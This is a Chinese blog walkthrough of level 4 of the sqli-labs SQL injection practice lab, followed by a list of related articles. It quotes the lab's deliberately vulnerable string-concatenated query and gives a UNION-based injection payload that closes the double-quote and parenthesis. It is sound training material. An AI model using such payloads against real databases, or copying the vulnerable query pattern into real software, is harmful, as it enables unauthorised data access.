sql-labs SQL注入平台-第4关Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

已于 2023-09-03 13:49:28 修改
阅读量238 收藏 1
点赞数 1
分类专栏: # Bugku、XCTF-WEB类写题过程 文章标签: sql less 数据库 web安全 sql注入
于 2023-09-03 13:46:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Onlyone_1314/article/details/132649672
版权

Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
查看源代码
在这里插入图片描述

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

发现我们输入的id值被括号(“”)包围起来了,这样导致我们输入的值都会被当作括号里的id,且两边被双引号包围
所以我们需要在第3关的单引号的基础上,变成双引号让它完成闭合符合现在的格式:

id=0") union select 1,2,3 --+

在这里插入图片描述

这样输入到后端的SQL语句就是:

  $sql="SELECT * FROM users WHERE id=("0") union select 1,2,3 --+') LIMIT 0,1";

成功使用union联合查询
其他的步骤就和第3关类似了。
sql-labs SQL注入平台-第3关Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入):https://blog.csdn.net/Onlyone_1314/article/details/130913789

大灬白
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
SQL注入攻击】GET-Error based-Double quotes-String(基于错误的GET双引号字符注入
sm1918451478的博客
10-23 244
【QSL注入攻击】Double quotes(基于错误的GET双引号字符注入
sqlilabs Less-3 GET-Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)_小白鼠日常
captainLink的博客
06-10 213
sqlilabs-less3通(小白鼠日常)
SQL注入攻击】GET-Double Injection-Double Quotes-String(双注入GET双引号字符注入
sm1918451478的博客
11-02 210
SQL注入攻击】GET-Double Injection-Double Quotes-String(双注入GET双引号字符注入
Less4-GET-基于错误-双引号-字符
qq_41883052的博客
05-18 130
初始页面无id参数 添加?id=1页面返回正常 添加'测试页面回显正常 添加"测试页面报错,可能存在SQL注入漏洞 分析报错语句: "1"")LIMIT 0,1 处有错误 去掉我们输入的" 原语句可能为: SELECT * FROM table WHERE id = ("1") LIMIT 0,1 继续测试,分析报错语句得出需要闭合" 构造 接着构造 and "1 页面返回正常 构造 and "0 页面无回显 两次测试页面返回不一样 存在SQL注入漏洞 因为页面会回显数据所以使用union注入.
SQLi LABS Less-4 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
sqli第四sqlilabs less-4,sqli-labs less4 判断注入
sqli-labs:less-4(双引号报错注入
羽的博客
07-13 188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
sql-labs通技巧
03-01
SQL注入常用靶场的通技巧
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
SQL中top的使用
m0_57310426的博客
04-22 397
语法格式: SELECT TOP n PERCENT <列名表> FROM <表名> [查询条件]语法格式: SELECT TOP n <列名表> FROM <表名> [查询条件]其中,n为所返回的记录数所占结果集中记录数目的百分比数。1.介绍:查询最热门,最高的分的前几条数据。(2)返回结果集中指定百分比的记录数。其中,n为要返回结果集中的记录条数。2.查询成绩前10%的学生的信息。(1)返回确定数目的记录个数。1.查询成绩前十的学生的信息。
[SWPUCTF-2022-新生赛]ez_sql
liaochonxiang的博客
04-24 364
根据提示,POST传参得到假的flag。
【个人博客搭建】(13)SqlSugar仓储实现
【一个人三座城】的博客
04-24 424
SqlSugar仓储实现
sqllibs 27-51payload
最新发布
cooper的笔记本
04-27 652
sqllibs 27-51payload
数据库】MySQL分页查询
学习笔记,人工智能,教程,技术分享!
04-19 598
比如:size=10那么, page 和 size 记录范围 和 起始记录索引值 limit。limit offset(开始记录索引,是从0开始的),size(要取出的条数);通用的分页查询写法(page:页数,size:每页显示的记录条数)记住每页的起始记录索引值:(page-1)*size。案例:(查询有奖金且工资最高的前10名的员工信息)案例:(查询第11条到第25条)2页:11-20条 10,10。案例:(查询前5条员工数据)1页: 1-10条 0,10。where ....等等。
SQL的基础语句
qq_51321722的博客
04-22 983
因此在写子查询语句时,可以先测试下内层的子查询语句是否输出了想要的内容,再一层层往外测试,增加子查询正确率。使用SELECT查询时,如果结果集数据量很大,比如几万行数据,放在一个页面显示的话数据量太大,不如分页显示,每次显示100条。上述查询LIMIT 3 OFFSET 0表示,对结果集从0号记录开始,最多取3条。包含左边表的全部行(不管右边的表中是否存在与他们匹配的行),以及右边表中全部匹配的行。包含右边表的全部行(不管右边的表中是否存在与他们匹配的行),以及左边表中全部匹配的行。
mysql-sql-练习题-1
weixin_45705483的博客
04-23 117
mysql-sql-练习题-1,简单、中档、难
10 SQL进阶 -- 综合练习题 -- 10道经典SQL题目,配套数据与解答
TF(腾飞)开源
04-20 1204
SQL进阶 -- 综合练习题 -- 10道经典SQL题目,配套数据与解答。
sql-labs第24二次注入
07-28
对于 SQL-Labs 第 24 的二次注入,你可以尝试以下步骤来完成任务: 1. 理解目标:首先,你需要了解任务的目标是什么。二次注入通常发生在用户输入被直接拼接到 SQL 查询语句中的情况。了解目标有助于你确定注入点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值